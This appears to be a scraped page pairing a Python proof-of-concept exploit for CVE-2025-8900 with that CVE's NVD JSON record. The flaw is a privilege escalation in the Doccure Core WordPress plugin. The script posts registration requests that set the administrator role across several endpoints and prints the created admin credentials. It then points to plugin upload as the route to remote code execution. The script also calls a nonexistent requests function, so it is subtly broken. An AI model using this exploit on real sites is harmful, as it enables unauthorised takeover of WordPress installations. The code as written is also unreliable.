CVE-2025-8900

import requests import re # CVE-2025-8900 PoC - Doccure Core Plugin Privilege Escalation # Target: WordPress site with Doccure Core plugin < 1.5.4 target_url = "http://target-wordpress-site.com" # Generate random username and email for registration username = f"attacker_{requests.utils.default_username()}" email = f"{username}@attacker.com" # Construct the registration request with admin role registration_data = { "user_login": username, "user_email": email, "user_pass": "P@ssw0rd123!", "user_type": "administrator", # Key parameter for privilege escalation "role": "administrator", "wp-submit": "Register" } # Try common registration endpoints endpoints = [ "/wp-login.php?action=register", "/register/", "/wp-signup.php", "/?rest_route=/doccure/v1/register" ] print(f"[*] CVE-2025-8900 PoC - Attempting privilege escalation...") print(f"[*] Target: {target_url}") print(f"[*] Username: {username}") print(f"[*] Email: {email}") for endpoint in endpoints: url = target_url + endpoint try: response = requests.post(url, data=registration_data, timeout=10, allow_redirects=False) # Check for successful registration indicators if response.status_code in [200, 302] and ("success" in response.text.lower() or "checkemail" in response.text.lower()): print(f"[+] SUCCESS: Registration request sent to {endpoint}") print(f"[+] Admin account created: {username} / P@ssw0rd123!") print(f"[+] Login URL: {target_url}/wp-login.php") break except requests.exceptions.RequestException as e: print(f"[-] Failed to connect to {endpoint}: {e}") print("\n[*] After successful registration, login to WordPress admin panel") print("[*] Navigate to Plugins -> Add New -> Upload Plugin to gain RCE")

{"cve": {"id": "CVE-2025-8900", "sourceIdentifier": "[email protected]", "published": "2025-11-03T15:15:38.177", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Doccure Core plugin for WordPress is vulnerable to privilege escalation in versions up to, and excluding, 1.5.4. This is due to the plugin allowing users who are registering new accounts to set their own role or by supplying 'user_type' field. This makes it possible for unauthenticated attackers to gain elevated privileges by creating an account with the administrator role."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://themeforest.net/item/doccure-medical-wordpress-theme/34329202", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/49e133c9-5d3b-4a2a-8385-e2db44baa217?source=cve", "source": "[email protected]"}]}}